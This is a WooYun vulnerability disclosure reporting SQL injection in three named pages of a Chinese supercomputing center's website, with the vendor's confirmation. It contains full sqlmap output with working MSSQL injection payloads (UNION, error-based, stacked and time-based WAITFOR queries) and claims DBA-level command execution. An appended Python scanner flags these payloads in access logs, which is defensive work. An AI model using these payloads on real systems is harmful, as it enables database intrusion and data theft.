
Vulnerability summary

Defect ID: wooyun-2016-0170428

Title: Multiple vulnerabilities at a National Supercomputing Center (getshell possible)

Related vendor: hnu.cn; www.hnu.edu.cn

Author: crown丶prince

Submitted: 2016-01-17 10:08

Fixed: 2016-02-27 11:49

Published: 2016-02-27 11:49

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-01-17: Details sent to the vendor, awaiting vendor action
2016-01-18: Vendor confirmed; details visible to the vendor only
2016-01-28: Details disclosed to core white hats and domain experts
2016-02-07: Details disclosed to regular white hats
2016-02-17: Details disclosed to intern white hats
2016-02-27: Details disclosed to the public

Summary:

Multiple vulnerabilities at a National Supercomputing Center (getshell possible, intranet roaming possible)

Detailed description:

The National Supercomputing Center in Changsha was approved by the Ministry of Science and Technology in October 2010, becoming the third national-level supercomputing center approved for construction after Tianjin and Shenzhen. On 28 November 2010 the center, with Tianhe-1 as its computing platform, broke ground at Hunan University, and on 4 November 2014 it went into formal operation there. The center is a major informatization project approved by the Ministry of Science and Technology: it is sited on the Hunan University campus, uses the Tianhe-1 high-performance computer of the National University of Defense Technology, is planned for a capacity of 1,000 trillion operations per second, and has a total investment of 720 million yuan.

I happened to come across the National Supercomputing Center in Changsha at http://nscc.hnu.edu.cn/ and tested it:

http://nscc.hnu.edu.cn/Article_NoticeList.aspx?id=13
http://nscc.hnu.edu.cn/Article_NewsList.aspx?id=14
http://nscc.hnu.edu.cn/Article_ApplyList.aspx?id=4

All three are vulnerable to SQL injection.
[1] sqlmap screenshot (image 1.png not included)

[2] The database account has DBA privileges, so commands can be executed directly; the server sits on the internal network (images 2.png and 3.png not included)

[3] Database information (image 4.png not included)

What appears to be the project information database (image 5.png not included)

Not explored further.

Proof of vulnerability:

Full sqlmap run:

[18:09:00] [INFO] testing connection to the target URL
[18:09:01] [INFO] testing if the target URL is stable. This can take a couple of seconds
[18:09:02] [INFO] target URL is stable
[18:09:02] [INFO] testing if GET parameter 'id' is dynamic
[18:09:02] [INFO] confirming that GET parameter 'id' is dynamic
[18:09:03] [INFO] GET parameter 'id' is dynamic
[18:09:03] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'Microsoft SQL Server')
[18:09:03] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values? [Y/n]
[18:09:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:09:31] [WARNING] reflective value(s) found and filtering out
[18:09:32] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[18:09:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:09:32] [INFO] GET parameter 'id' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[18:09:32] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:09:33] [INFO] GET parameter 'id' is 'Microsoft SQL Server/Sybase inline queries' injectable
[18:09:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[18:09:33] [WARNING] time-based comparison requires larger statistical model, please wait..................
[18:09:48] [INFO] GET parameter 'id' seems to be 'Microsoft SQL Server/Sybase stacked queries' injectable
[18:09:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:09:59] [INFO] GET parameter 'id' seems to be 'Microsoft SQL Server/Sybase time-based blind' injectable
[18:09:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:09:59] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:10:04] [INFO] target URL appears to be UNION injectable with 11 columns
[18:10:06] [WARNING] combined UNION/error-based SQL injection case found on column 2. sqlmap will try to find another column with better characteristics
[18:10:07] [WARNING] combined UNION/error-based SQL injection case found on column 1. sqlmap will try to find another column with better characteristics
[18:10:07] [WARNING] combined UNION/error-based SQL injection case found on column 11. sqlmap will try to find another column with better characteristics
[18:10:08] [WARNING] combined UNION/error-based SQL injection case found on column 9. sqlmap will try to find another column with better characteristics
[18:10:08] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 66 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=14 AND 5278=5278

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=14 AND 2616=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2616=2616) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(112)+CHAR(113)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=14 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(83)+CHAR(65)+CHAR(102)+CHAR(99)+CHAR(108)+CHAR(104)+CHAR(80)+CHAR(110)+CHAR(74)+CHAR(112)+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(112)+CHAR(113),NULL,NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=14 ; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=14 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (3942=3942) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(112)+CHAR(113))
---
[18:10:23] [INFO] testing Microsoft SQL Server
[18:10:24] [INFO] confirming Microsoft SQL Server
[18:10:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
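As an added example (not part of the original report), the following Python scanner flags the payload families listed in the sqlmap output above when they appear in IIS W3C access-log lines for the three list pages; the log lines, client addresses, user agents and field order are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# Payload families taken from the sqlmap injection-point listing in the report.
SIGNATURES = {
    "time-based/stacked": re.compile(r"WAITFOR\s+DELAY", re.I),
    "union": re.compile(r"UNION\s+ALL\s+SELECT", re.I),
    "error-based": re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I),
    "boolean-based": re.compile(r"\bAND\s+\d+\s*=\s*\d+\b", re.I),
}

# Constructed IIS W3C log lines (field order assumed: date time s-ip cs-method
# cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status).
# Client addresses and user agents are made up for this example.
SAMPLE_LOG = """\
2016-01-16 18:09:00 10.0.0.5 GET /Article_NewsList.aspx id=14 80 - 203.0.113.7 scanner/1.0 200
2016-01-16 18:09:31 10.0.0.5 GET /Article_NewsList.aspx id=14+AND+5278%3D5278 80 - 203.0.113.7 scanner/1.0 200
2016-01-16 18:09:33 10.0.0.5 GET /Article_NewsList.aspx id=14+%3B+WAITFOR+DELAY+%270%3A0%3A5%27-- 80 - 203.0.113.7 scanner/1.0 200
2016-01-16 18:09:59 10.0.0.5 GET /Article_NewsList.aspx id=14+UNION+ALL+SELECT+NULL%2CNULL-- 80 - 203.0.113.7 scanner/1.0 200
2016-01-16 18:10:00 10.0.0.5 GET /Article_NoticeList.aspx id=13 80 - 198.51.100.2 Mozilla/5.0 200
"""

def analyse_query(query: str, param: str = "id"):
    """Classify one URL-encoded query string. The list pages take a purely
    numeric `id`, so any other value is flagged and then matched against the
    payload families. Returns (is_suspicious, labels)."""
    labels = []
    for value in parse_qs(query, keep_blank_values=True).get(param, []):
        if value.strip().isdigit():
            continue
        labels.append("non-numeric id")
        labels.extend(name for name, rx in SIGNATURES.items() if rx.search(value))
    return (bool(labels), labels)

def scan_iis_log(lines):
    """Return (timestamp, client_ip, uri_stem, labels) for each suspicious request."""
    findings = []
    for line in lines:
        fields = line.split()
        if not fields or fields[0].startswith("#") or len(fields) < 9:
            continue  # comment/header line or truncated record
        date, time, _, _, stem, query, _, _, client = fields[:9]
        suspicious, labels = analyse_query(query)
        if suspicious:
            findings.append((f"{date} {time}", client, stem, labels))
    return findings

if __name__ == "__main__":
    for finding in scan_iis_log(SAMPLE_LOG.splitlines()):
        print(*finding)
```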

Fix recommendation:

Copyright notice: please credit the source when reposting: crown丶prince@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed: 2016-01-18 09:02

Vendor reply:

Confirmed; will fix as soon as possible

Latest status:

None yet